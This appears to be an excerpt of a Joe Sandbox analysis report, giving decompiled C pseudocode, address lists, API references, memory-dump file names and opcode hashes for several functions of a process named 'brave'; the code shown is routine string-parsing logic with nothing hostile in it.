				E00007FF67FF652B24DD0();
				_a40 = _t213;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t259 + 3;
				E00007FF67FF652B27F20(_t213, __rbx);
				_t250 = _t213;
				if (_t213 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t250);
				_push(__rbx);
				_t214 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t214[1]);
				r10d =  *_t214 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t127 = (r8d >> 0x1f) + r8d >> 1;
				_t182 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t127 + _t127 * 2) * 8)))) - r10b;
				if (_t182 == 0) goto 0x52b26680;
				if (_t182 <= 0) goto 0x52b266c0;
				r8d = _t127;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b26249
0x7ff652b2624f
0x7ff652b26266
0x7ff652b2626a
0x7ff652b26272
0x7ff652b26275
0x7ff652b2627b
0x7ff652b2627f
0x7ff652b26288
0x7ff652b2628e
0x7ff652b262a5
0x7ff652b262a9
0x7ff652b262b1
0x7ff652b262b4
0x7ff652b262ba
0x7ff652b262be
0x7ff652b262c7
0x7ff652b262cd
0x7ff652b262e4
0x7ff652b262e8
0x7ff652b262f0
0x7ff652b262f3
0x7ff652b262f9
0x7ff652b262fd
0x7ff652b26306
0x7ff652b2630c
0x7ff652b26323
0x7ff652b26327
0x7ff652b2632f
0x7ff652b26332
0x7ff652b26338
0x7ff652b2633c
0x7ff652b26340
0x7ff652b2634e
0x7ff652b26350
0x7ff652b26356
0x7ff652b26369
0x7ff652b2636d
0x7ff652b26375
0x7ff652b26378
0x7ff652b26383
0x7ff652b26386
0x7ff652b2638d
0x7ff652b26393
0x7ff652b2639a
0x7ff652b2639e
0x7ff652b263b1
0x7ff652b263b6
0x7ff652b263c0
0x7ff652b263c6
0x7ff652b263dd
0x7ff652b263e1
0x7ff652b263e9
0x7ff652b263ec
0x7ff652b263f2
0x7ff652b263f6
0x7ff652b263ff
0x7ff652b26405
0x7ff652b2641c
0x7ff652b26420
0x7ff652b26428
0x7ff652b2642b
0x7ff652b26431
0x7ff652b26435
0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: eff3cf0a3ead3182ce9a2d061d4ff4c747767f33054f4b93d232421270182bae
Instruction ID: 044115622d75a319539fee17d9a8f4bdeae9b6c40e08ce06994c42863fa25e7c
Opcode Fuzzy Hash: eff3cf0a3ead3182ce9a2d061d4ff4c747767f33054f4b93d232421270182bae
Instruction Fuzzy Hash: 9221E772A09B05C2E7208F14E8853A937B0FB9474CF295625C2CC573A9DFBDD585C794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B26288 Relevance: 1.3, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00007FF67FF652B26288(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t108;
				signed int _t119;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				signed int _t132;
				signed int _t134;
				signed int _t136;
				signed int _t139;
				signed int _t142;
				void* _t171;
				intOrPtr* _t176;
				intOrPtr* _t179;
				intOrPtr* _t182;
				char* _t183;
				signed char* _t184;
				intOrPtr* _t187;
				intOrPtr* _t190;
				signed char* _t193;
				intOrPtr* _t196;
				signed char* _t197;
				signed char* _t199;
				signed char* _t200;
				intOrPtr* _t233;
				signed char* _t234;
				signed char* _t235;
				long long _t244;
				void* _t251;

				_t125 =  *(__rbx + 0x28);
				if (_t125 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526dc;
				_t176 = (_t125 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t176 + 4)) = 0;
				 *(__rbx + 0x28) = _t125 + 1;
				 *_t176 = 0x27;
				 *((long long*)(_t176 + 0x10)) = 0x52dd5320;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t127 =  *(__rbx + 0x28);
				if (_t127 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526a9;
				_t179 = (_t127 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t179 + 4)) = 0;
				 *(__rbx + 0x28) = _t127 + 1;
				 *_t179 = 0x27;
				 *((long long*)(_t179 + 0x10)) = 0x52dd53c0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				_t129 =  *(__rbx + 0x28);
				if (_t129 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52702;
				_t182 = (_t129 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t182 + 4)) = 0;
				 *(__rbx + 0x28) = _t129 + 1;
				 *_t182 = 0x27;
				 *((long long*)(_t182 + 0x10)) = 0x52dd5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x52b25c22;
				 *_t182 =  *_t182 + __eax;
				_t108 =  *(__rbx + 0x28);
				if (_t108 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b25c20;
				_t233 = (_t108 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t233 + 4)) = 0;
				 *(__rbx + 0x28) = _t108 + 1;
				 *_t233 = 0x42;
				 *((intOrPtr*)(_t233 + 0x10)) = E00007FF67FF652B24E90(_t182, __rbx, __rdx, __r8, _t251);
				_t183 =  *(__rbx + 0x18);
				if ( *_t183 != 0x5f) goto 0x52b25c20;
				_t184 = _t183 + 1;
				 *(__rbx + 0x18) = _t184;
				E00007FF67FF652B25BC0();
				E00007FF67FF652B24DD0();
				_a40 = _t184;
				_t132 =  *(__rbx + 0x28);
				if (_t132 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52670;
				_t187 = (_t132 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t187 + 4)) = 0;
				 *(__rbx + 0x28) = _t132 + 1;
				 *_t187 = 0x27;
				 *((long long*)(_t187 + 0x10)) = 0x52dd5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t134 =  *(__rbx + 0x28);
				if (_t134 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52715;
				_t190 = (_t134 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t190 + 4)) = 0;
				 *(__rbx + 0x28) = _t134 + 1;
				 *_t190 = 0x27;
				 *((long long*)(_t190 + 0x10)) = 0x52dd5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t136 =  *(__rbx + 0x28);
				if (_t136 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t193 = (_t136 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t193 + 4)) = 0;
				 *(__rbx + 0x28) = _t136 + 1;
				 *_t193 = 0x27;
				 *((long long*)(_t193 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t193;
				_t139 =  *(__rbx + 0x28);
				if (_t139 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t196 = (_t139 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t196 + 4)) = 0;
				 *(__rbx + 0x28) = _t139 + 1;
				 *_t196 = 0x27;
				 *((long long*)(_t196 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t196, __rbx);
				_a40 = _t196;
				if (_t196 == 0) goto 0x52b25c20;
				if ( *_t196 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t197 = _t196 + 1;
				 *(__rbx + 0x18) = _t197;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t197;
				_t234 = _t197;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t234[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t234;
				_t199 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t244 = _a40;
				if (_t244 == 0) goto 0x52b25c20;
				_t142 =  *(__rbx + 0x38);
				if (_t142 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t142 * 8)) = _t244;
				 *(__rbx + 0x38) = _t142 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t199;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t244 + 3;
				E00007FF67FF652B27F20(_t199, __rbx);
				_t235 = _t199;
				if (_t199 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t235);
				_push(__rbx);
				_t200 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t200[1]);
				r10d =  *_t200 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t119 = (r8d >> 0x1f) + r8d >> 1;
				_t171 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t119 + _t119 * 2) * 8)))) - r10b;
				if (_t171 == 0) goto 0x52b26680;
				if (_t171 <= 0) goto 0x52b266c0;
				r8d = _t119;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b26288
0x7ff652b2628e
0x7ff652b262a5
0x7ff652b262a9
0x7ff652b262b1
0x7ff652b262b4
0x7ff652b262ba
0x7ff652b262be
0x7ff652b262c7
0x7ff652b262cd
0x7ff652b262e4
0x7ff652b262e8
0x7ff652b262f0
0x7ff652b262f3
0x7ff652b262f9
0x7ff652b262fd
0x7ff652b26306
0x7ff652b2630c
0x7ff652b26323
0x7ff652b26327
0x7ff652b2632f
0x7ff652b26332
0x7ff652b26338
0x7ff652b2633c
0x7ff652b26340
0x7ff652b2634e
0x7ff652b26350
0x7ff652b26356
0x7ff652b26369
0x7ff652b2636d
0x7ff652b26375
0x7ff652b26378
0x7ff652b26383
0x7ff652b26386
0x7ff652b2638d
0x7ff652b26393
0x7ff652b2639a
0x7ff652b2639e
0x7ff652b263b1
0x7ff652b263b6
0x7ff652b263c0
0x7ff652b263c6
0x7ff652b263dd
0x7ff652b263e1
0x7ff652b263e9
0x7ff652b263ec
0x7ff652b263f2
0x7ff652b263f6
0x7ff652b263ff
0x7ff652b26405
0x7ff652b2641c
0x7ff652b26420
0x7ff652b26428
0x7ff652b2642b
0x7ff652b26431
0x7ff652b26435
0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 0b72ed1d1ec91a9fecf57987d9700a88a3447d5267269d2675c8036d64f49d40
Instruction ID: efe6f30d01c69bb46ee12730b745ec934c13e4e1bd6ee9c4925576c510501206
Opcode Fuzzy Hash: 0b72ed1d1ec91a9fecf57987d9700a88a3447d5267269d2675c8036d64f49d40
Instruction Fuzzy Hash: 52110772A09B0582E7208F14EC843A937B0FB9474CF295225C28C973A5DFBDD585C784

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B2643E Relevance: 1.3, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00007FF67FF652B2643E(void* __rbx, signed char* _a40) {
				signed int _t61;
				signed int _t65;
				signed int _t68;
				signed int _t71;
				void* _t91;
				signed char* _t96;
				intOrPtr* _t99;
				signed char* _t100;
				signed char* _t102;
				signed char* _t103;
				signed char* _t124;
				signed char* _t125;
				long long _t132;

				_t65 =  *(__rbx + 0x28);
				if (_t65 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t96 = (_t65 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t96 + 4)) = 0;
				 *(__rbx + 0x28) = _t65 + 1;
				 *_t96 = 0x27;
				 *((long long*)(_t96 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t96;
				_t68 =  *(__rbx + 0x28);
				if (_t68 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t99 = (_t68 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t99 + 4)) = 0;
				 *(__rbx + 0x28) = _t68 + 1;
				 *_t99 = 0x27;
				 *((long long*)(_t99 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t99, __rbx);
				_a40 = _t99;
				if (_t99 == 0) goto 0x52b25c20;
				if ( *_t99 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t100 = _t99 + 1;
				 *(__rbx + 0x18) = _t100;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t100;
				_t124 = _t100;
				goto 0x52b25f58;
				r12d =  *(__rbx + 0x28);
				 *(__rbx + 0x18) =  &(_t124[1]);
				E00007FF67FF652B289F0(__rbx);
				if ( *( *(__rbx + 0x18)) == 0x49) goto 0x52b26584;
				 *(__rbx + 0x18) = _t124;
				_t102 = _a40;
				 *(__rbx + 0x28) = r12d;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48));
				goto 0x52b25d30;
				_t132 = _a40;
				if (_t132 == 0) goto 0x52b25c20;
				_t71 =  *(__rbx + 0x38);
				if (_t71 -  *((intOrPtr*)(__rbx + 0x3c)) >= 0) goto 0x52b25c20;
				 *((long long*)( *((intOrPtr*)(__rbx + 0x30)) + _t71 * 8)) = _t132;
				 *(__rbx + 0x38) = _t71 + 1;
				E00007FF67FF652B24DD0();
				_a40 = _t102;
				 *((intOrPtr*)(__rbx + 0x4c)) = 1;
				 *(__rbx + 0x18) = _t132 + 3;
				E00007FF67FF652B27F20(_t102, __rbx);
				_t125 = _t102;
				if (_t102 != 0) goto 0x52b26386;
				goto 0x52b25c20;
				asm("o16 nop [eax+eax]");
				_push(0x52dd53e0);
				_push(_t125);
				_push(__rbx);
				_t103 =  *(__rbx + 0x18);
				if (sil == 0) goto 0x52b266c8;
				 *(__rbx + 0x18) =  &(_t103[1]);
				r10d =  *_t103 & 0x000000ff;
				if (sil != 0) goto 0x52b266d0;
				r8d = 0x45;
				asm("o16 nop [eax+eax]");
				_t61 = (r8d >> 0x1f) + r8d >> 1;
				_t91 =  *((intOrPtr*)( *((intOrPtr*)(0x52dd4820 + (_t61 + _t61 * 2) * 8)))) - r10b;
				if (_t91 == 0) goto 0x52b26680;
				if (_t91 <= 0) goto 0x52b266c0;
				r8d = _t61;
				if (0 != r8d) goto 0x52b26648;
				return 0;
			}

0x7ff652b2643e
0x7ff652b26444
0x7ff652b2645b
0x7ff652b2645f
0x7ff652b26467
0x7ff652b2646a
0x7ff652b26470
0x7ff652b26474
0x7ff652b26480
0x7ff652b26485
0x7ff652b26493
0x7ff652b26498
0x7ff652b264a2
0x7ff652b264a8
0x7ff652b264bf
0x7ff652b264c3
0x7ff652b264cb
0x7ff652b264ce
0x7ff652b264d4
0x7ff652b264d8
0x7ff652b264dc
0x7ff652b264eb
0x7ff652b264f0
0x7ff652b264f8
0x7ff652b26501
0x7ff652b26507
0x7ff652b26512
0x7ff652b26517
0x7ff652b2651e
0x7ff652b26522
0x7ff652b26537
0x7ff652b2653c
0x7ff652b26541
0x7ff652b26544
0x7ff652b26550
0x7ff652b26557
0x7ff652b2655e
0x7ff652b2656a
0x7ff652b2656c
0x7ff652b26570
0x7ff652b26575
0x7ff652b2657c
0x7ff652b2657f
0x7ff652b26584
0x7ff652b2658c
0x7ff652b26592
0x7ff652b26598
0x7ff652b265a8
0x7ff652b265b2
0x7ff652b265ba
0x7ff652b265bf
0x7ff652b265d0
0x7ff652b265da
0x7ff652b265de
0x7ff652b265e6
0x7ff652b265ec
0x7ff652b265f2
0x7ff652b265f7
0x7ff652b26600
0x7ff652b26601
0x7ff652b26602
0x7ff652b26607
0x7ff652b26614
0x7ff652b2661e
0x7ff652b26626
0x7ff652b2662d
0x7ff652b26633
0x7ff652b26642
0x7ff652b26656
0x7ff652b26666
0x7ff652b26669
0x7ff652b2666b
0x7ff652b2666d
0x7ff652b26673
0x7ff652b2667e

APIs

malloc.MSVCRT ref: 00007FF652B52752

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction ID: 283b563fb99f0db2661c3d8cd74b4f67f3b4b56d6550772adc794aff77568ea9
Opcode Fuzzy Hash: d48a312505f0d7753b5e0af4059756c973b08e8edd7f46ab5558ae8c63b7ed28
Instruction Fuzzy Hash: 6011F572A09B0182E7208F14EC843A933B1FB9474CF699635C28C973A9DFBDE595C790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B26306 Relevance: 1.3, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00007FF67FF652B26306(void* __eax, void* __ebx, void* __rbx, void* __rcx, void* __rdx, void* __r8, signed char* _a40) {
				signed int _t92;
				signed int _t103;
				signed int _t109;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t119;
				signed int _t122;
				void* _t149;
				intOrPtr* _t154;
				char* _t155;
				signed char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t162;
				signed char* _t165;
				intOrPtr* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t172;
				intOrPtr* _t203;
				signed char* _t204;
				signed char* _t205;
				long long _t214;
				void* _t221;

				_t109 =  *(__rbx + 0x28);
				if (_t109 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52702;
				_t154 = (_t109 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t154 + 4)) = 0;
				 *(__rbx + 0x28) = _t109 + 1;
				 *_t154 = 0x27;
				 *((long long*)(_t154 + 0x10)) = 0x52dd5360;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0xa;
				goto 0x52b25c22;
				 *_t154 =  *_t154 + __eax;
				_t92 =  *(__rbx + 0x28);
				if (_t92 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b25c20;
				_t203 = (_t92 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t203 + 4)) = 0;
				 *(__rbx + 0x28) = _t92 + 1;
				 *_t203 = 0x42;
				 *((intOrPtr*)(_t203 + 0x10)) = E00007FF67FF652B24E90(_t154, __rbx, __rdx, __r8, _t221);
				_t155 =  *(__rbx + 0x18);
				if ( *_t155 != 0x5f) goto 0x52b25c20;
				_t156 = _t155 + 1;
				 *(__rbx + 0x18) = _t156;
				E00007FF67FF652B25BC0();
				E00007FF67FF652B24DD0();
				_a40 = _t156;
				_t112 =  *(__rbx + 0x28);
				if (_t112 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52670;
				_t159 = (_t112 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t159 + 4)) = 0;
				 *(__rbx + 0x28) = _t112 + 1;
				 *_t159 = 0x27;
				 *((long long*)(_t159 + 0x10)) = 0x52dd5340;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 9;
				_t114 =  *(__rbx + 0x28);
				if (_t114 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52715;
				_t162 = (_t114 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t162 + 4)) = 0;
				 *(__rbx + 0x28) = _t114 + 1;
				 *_t162 = 0x27;
				 *((long long*)(_t162 + 0x10)) = 0x52dd5400;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 0x11;
				_t116 =  *(__rbx + 0x28);
				if (_t116 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b526ef;
				_t165 = (_t116 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t165 + 4)) = 0;
				 *(__rbx + 0x28) = _t116 + 1;
				 *_t165 = 0x27;
				 *((long long*)(_t165 + 0x10)) = 0x52dd53a0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 7;
				E00007FF67FF652B25BC0();
				r9d = 0;
				E00007FF67FF652B24DD0();
				_a40 = _t165;
				_t119 =  *(__rbx + 0x28);
				if (_t119 -  *((intOrPtr*)(__rbx + 0x2c)) >= 0) goto 0x52b52683;
				_t168 = (_t119 << 5) +  *((intOrPtr*)(__rbx + 0x20));
				 *((long long*)(_t168 + 4)) = 0;
				 *(__rbx + 0x28) = _t119 + 1;
				 *_t168 = 0x27;
				 *((long long*)(_t168 + 0x10)) = 0x52dd53e0;
				 *((intOrPtr*)(__rbx + 0x48)) =  *((intOrPtr*)(__rbx + 0x48)) + 8;
				goto 0x52b25c22;
				E00007FF67FF652B26EE0(_t168, __rbx);
				_a40 = _t168;
				if (_t168 == 0) goto 0x52b25c20;
				if ( *_t168 != 0x18) goto 0x52b25d39;
				goto 0x52b25c22;
				goto 0x52b26051;
				_t169 = _t168 + 1;
				 *(__rbx + 0x18) = _t169;
				E00007FF67FF652B289F0(__rbx);
				E00007FF67FF652B24DD0();
				_a40 = _t169;
				_t204 = _t169;
				goto 0x52b25f58;
